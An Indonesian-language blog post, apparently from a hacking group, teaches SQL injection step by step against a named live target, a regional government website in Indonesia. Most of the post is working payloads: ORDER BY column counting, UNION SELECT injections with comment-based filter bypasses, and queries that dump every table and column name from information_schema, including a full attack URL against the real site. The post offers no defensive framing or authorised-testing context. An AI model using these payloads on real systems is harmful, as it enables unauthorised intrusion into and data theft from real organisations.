How to search for bugs with sql injection - Tatsumi Crew

News

Post Top Ad

Tuesday, March 20, 2018

How to search for bugs with sql injection

Hallo Gan disini Saya Akan Share Tutorial SQL Injection
Apa Sih SQL Injection (SQLI) Itu ?
SQL Injection adalah teknik hacking yang ditujukan untuk menyerang database SQL server. Caranya yaitu dengan memanfaatkan celah yang ada dan penempatan kode SQL server, dengan memasukan kode berbahaya melalui input masuk halaman suatu situs.

Oke Lansung Saja
Disini Gw sudah Mempunyai LIVE TARGET
Live Target : https://www.trenggalekkab.go.id/menu?page=17&cat=16
Yang Harus Kita Lakukan Adalah Dengan memberi simbol ‘ di belakang nomor contoh seperti ss di bawah ini

Jika Vuln Akan Muncul Seperti ss di bawah ini

Tergantung Jenis Jenis Vuln SQLI
– Text Berita Tiba Tiba Menghilang
– Gambar Post Tiba Tiba Blank / Tidak Ada sama Sekali Dari Semulanya
Setelah Menemukan Yang Vuln Terus Masukin Query Dibawah Ini
+order+by+100– < kita ambil dari angka besar dulu
jika tidak menemukan error/blank postnya cukup memakai tanda petik (‘)
‘+order+by+100–+-
setelah menemukan error pada query angka 100 di atas mari kita ubah angkanya ke yang lebih kecil dari 1-100 dan cari lah yang errornya berada di angka berapa

ss di atas artinya angka 1 tidak error , cari lagi sampe dapet yang error
tapi jangan terlewat ya kalau bisa sih ber urutan dari 1-100

disini yang error di angka 5 berati yang vuln nya di angka 4 alias ga error

Setelah Anda Tau Errornya Pada Angka Berapa Masukin Query Dibawah Ini :
+union+select+1,2,3–
‘+/*!50000union*/+/*!50000select*/+1,2,3–+-
kalau bisa samain yang belakangnya dengan query pertama pas order by (–+-) terkadang websitenya juga bisa (–) tapi disini saya mencoba bypass dengan (–+-) karena memakai yang (–) tidak ada errornya sama sekali.
Setelah Itu kita kan tadi menemukan error di angka 5
yang ga error di angka 4
kita masukin query di atas sampai dengan nomor 4
contoh :
https://www.trenggalekkab.go.id/menu?page=17&cat=16’+/*!50000union*/+/*!50000select*/+1,2,3,4–+-
Jika Sudah Maka bakal muncul angka yang sangat tebal / berwarna itu berati yang vuln nya

Setelah itu Masukan Query
+union+select+1,2,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),4,5,6– kalau error pake tanda (‘) (-)
‘+union+select+1,2,3,4,concat(@c:=0x00,if((select count(*) from information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),6,7–+- < samain juga kayak query pertama
tadi kan yang keluar angka 2 berarti angka 2 itu jangan di masukan ke query tapi urutan nya samain contoh
‘+union+select+1,concat(@c:=0x00,if((select count(*) from information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),3,4–+-
contoh lain lagi
misalnya kita menemukan error di angka 9 dan menemukan angka tebal di query selanjutnya dengan nomor 5 kita urut kan lagi
‘+union+select+1,2,3,4,concat(@c:=0x00,if((select count(*) from information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),6,7,8,9–+-  < ini hanya contoh saja buat pengurutan
dan hasil akan seperti ini kalau urutannya benar

Selesai Deh

No comments:

Post a Comment

Post Top Ad